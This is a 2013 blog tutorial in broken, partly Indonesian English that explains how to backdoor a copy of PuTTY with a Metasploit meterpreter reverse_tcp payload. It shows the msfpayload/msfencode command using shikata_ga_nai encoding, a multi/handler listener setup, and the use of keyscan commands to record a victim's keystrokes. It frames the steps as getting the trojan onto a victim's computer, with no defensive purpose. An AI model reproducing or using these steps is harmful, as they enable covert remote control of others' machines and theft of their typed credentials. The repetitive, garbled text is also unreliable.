Wednesday, January 23, 2013

conduct exploitation of the Windows Xp and exploitation windows 7 Creating a backdoor with x86/shikata_ga_na

If you think Windows 7 can not diexploit, you are wrong because there are many ways in which to be able to do exploits for an Operating System, now we will do srcexploits for Windows XP and 7, plus more ways to record the keyboard keystrokes (keylogger ) through meterpreter.Check it Out.

1. Find the file you will use to lure the target execute file. Here I use putty.exe file, so download first.

root@bt:~# wget http://the.earth.li/~sgtatham/putty/latest/x86/putty.exe

conduct exploitation of the Windows Xp and exploitation windows 7 Creating a backdoor with x86/shikata_ga_na

2. Infections file to be executed by the payload exploit.rubah putty.exe name manjadi putty_pro.exe and use exploits x86/shikata_ga_nai, create a master already knows.

root@bt:/# cd /pentest/exploits/framework
root@bt:/pentest/exploits/framework# ./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.125 R |./msfencode -t exe -x /tmp/putty.exe -k -o /tmp/putty_pro.exe -e x86/shikata_ga_nai -c 5

conduct exploitation of the Windows Xp and exploitation windows 7 Creating a backdoor with x86/shikata_ga_na

3. Run Metasploit and create a listener so that when the file we created above will automatically open meterpreter executable.

msfconsole 
use exploit/multi/handler 
set payload windows/meterpreter/reverse_tcp
set lhost IP_KITA
exploit

conduct exploitation of the Windows Xp and exploitation windows 7 Creating a backdoor with x86/shikata_ga_na

4. I do not know how to copy files that have been infected above into the victim's computer, somehow [the effort necessary bro]. When the executable file will then automatically meterpreter terbuka.sekarang up to you what to do with the computer.

conduct exploitation of the Windows Xp and exploitation windows 7 Creating a backdoor with x86/shikata_ga_na

conduct exploitation of the Windows Xp and exploitation windows 7 Creating a backdoor with x86/shikata_ga_na

note : our computer to the target will be lost when the file is executed connection closed [tested so we know].


5. Plus here is merecord all typed from the keyboard. Use the command keyscan_start and to see the results of the victim's keystrokes using keyscan_dump. Pawned!

Windows XP :

conduct exploitation of the Windows Xp and exploitation windows 7 Creating a backdoor with x86/shikata_ga_na


Windows 7 :



Hopefully this tutorial can help friends who are having trouble finding tutorialsl.


Recent Posts